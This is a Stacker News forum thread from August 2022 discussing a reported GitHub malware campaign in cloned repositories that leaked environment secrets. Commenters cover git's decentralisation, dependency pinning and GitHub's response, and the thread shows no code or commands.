🧵 Widespread malware attack on GitHub \ stacker news ~bitcoin

🧵 Widespread malware attack on GitHub nitter.it/stephenlacy/status/1554697077430505473

314 sats \ 14 comments \ @cryptocoin 3 Aug 2022 bitcoin

136 sats \ 1 reply \ @kilianbuhn 3 Aug 2022

Did you guys know that Git can be used without a central Github/Gitlab server?

Indeed it always could, it was one of the very early features to be used decentralized in p2p.

130 sats \ 0 replies \ @Brunswick 3 Aug 2022

The whole point if git is decentralized, it's just not doing it in a BitTorrent style DHT internet protocol (yes there are ways of connecting git this way).

Git is a way to keep files organized and revisioned across many connected or disconnected computers. It literally was designed to allow software development between teams and individuals that have no centralized organization and via any file-copy medium available including thumb drives. It was essentially an upgrade to managing software codebases with zip and patch files, which worked adequately for many decades. After Linus had some experience with a centralized VCS, but was still distributing his software in zip (tar.gz) files, he decided to write his own VCS so the community wasn't dependent on the existence of one corporation. He sat down and outlined a basic set of requirements for a VCS software that would do what he needed. Interestingly bitcoin's first revision was stored in git, and git was used to coordinate and secure the codebase around the world. You can go back to this first commit in the bitcoin-core repository and see what the first alpha version looked like.

125 sats \ 2 replies \ @sandbeach123old 3 Aug 2022

Another reason why I self host all my stuff. I use gitea on my umbrel node.

29 sats \ 1 reply \ @EnormousPony 3 Aug 2022

Bullshit claim, you really fork and host every dependency you have? Have you read the thread?

38 sats \ 0 replies \ @sandbeach123old 3 Aug 2022

I keep my stuff at a gitea instance. I do use dependencies but I do not host them. I use mainly Go. I guess with JS is more complicated. But that may not work for other people / businesses. I fail to see why my claim was bullshit.

125 sats \ 1 reply \ @rolator 3 Aug 2022 freebie

Could this possibly be related to the Solana hack?

105 sats \ 0 replies \ @cryptocoin OP 3 Aug 2022

There may have been individual cases where there was SOL stolen as a result of this github problem, but this person asserts that the hacks affecting Solana are unrelated to the github problem:

Lastly, the “malicious github” thread, the rust trojan horse, and the malicious pizza delivery guy theories are all false.

Going forward, plz do not jump to conclusions or believe everything you read. As we figure out what is happening, people like:

https://twitter.com/HelpedHope/status/1554812889168478208 https://nitter.net/HelpedHope/status/1554812889168478208

0 sats \ 4 replies \ @cryptocoin OP 3 Aug 2022

This attack will send the ENTIRE ENV of the script, application, laptop (electron apps), to the attacker's server!

ENVs include:

Security keys

AWS access keys

Crypto keys ... much mor

https://twitter.com/stephenlacy/status/1554697083331891201 https://nitter.it/stephenlacy/status/1554697083331891201

0 sats \ 3 replies \ @cryptocoin OP 3 Aug 2022

Hard to conclude that this is directly related to the solana private key leaks. Nevertheless, you should rotate your application secrets if you used any of the fake libraries on GitHub.

Always use rotating secrets if you can and vet the libraries you use.

https://twitter.com/stephenlacy/status/1554697077430505473

https://twitter.com/lxjhk/status/1554727870244605952 https://nitter.it/lxjhk/status/1554727870244605952

0 sats \ 2 replies \ @cryptocoin OP 3 Aug 2022

I have yet to find a single real GH org; it's all copies with 0 stars, created in the last 6-10 days.

Still something @github needs to cleanse, but far, far more limited than the quoted tweet makes it sound.

https://twitter.com/TwitchiH/status/1554718007443832832

As this is making the rounds, some more context:

This appears to be an extremely broad, low value, low effort, and likely low impact attack.

Given two major *coin attacks in the last 24 hours or so, infosec news gets more attention than usual.

https://twitter.com/TwitchiH/status/1554725705438601216 https://nitter.net/TwitchiH/status/1554725705438601216

10 sats \ 1 reply \ @cryptocoin OP 3 Aug 2022

If you use npm, go get or other automatic dependency grabbing systems you better be pinning deps to particular hashes.

Do not blindly trust deps by name.

Do not allow deps to automatically upgrade to a newer version.

Hard part: Your deps might be blindly trusting their deps.

https://twitter.com/stephenlacy/status/1554697077430505473

https://twitter.com/wtogami/status/1554716537323302912 https://nitter.it/wtogami/status/1554716537323302912

0 sats \ 0 replies \ @cryptocoin OP 4 Aug 2022

UPDATE

GitHub is investigating the Tweet published Wed, Aug. 3, 2022:

No repositories were compromised

Malicious code was posted to cloned repositories, not the repositories themselves

The clones were quarantined and there was no evident compromise of GitHub or maintainer accounts

https://twitter.com/GitHubSecurity/status/1554843443200806913 https://nitter.it/GitHubSecurity/status/1554843443200806913

0 sats \ 1 reply \ @cryptocoin OP 3 Aug 2022

The link for this post uses a read-only front-end for Twitter, which can be easier to read for viewing a full Twitter thread. The Tweet that kicked off the thread is:

I am uncovering what seems to be a massive widespread malware attack on @github.

Currently over 35k hits [Corrected later in the thread from repositories to hits].

So far found in projects including: crypto, golang, python, js, bash, docker, k8s

It is added to npm scripts, docker images and install docs

https://twitter.com/stephenlacy/status/1554697077430505473

5 sats \ 0 replies \ @DeezSats 3 Aug 2022

https://nitter.it/stephenlacy/status/1554697077430505473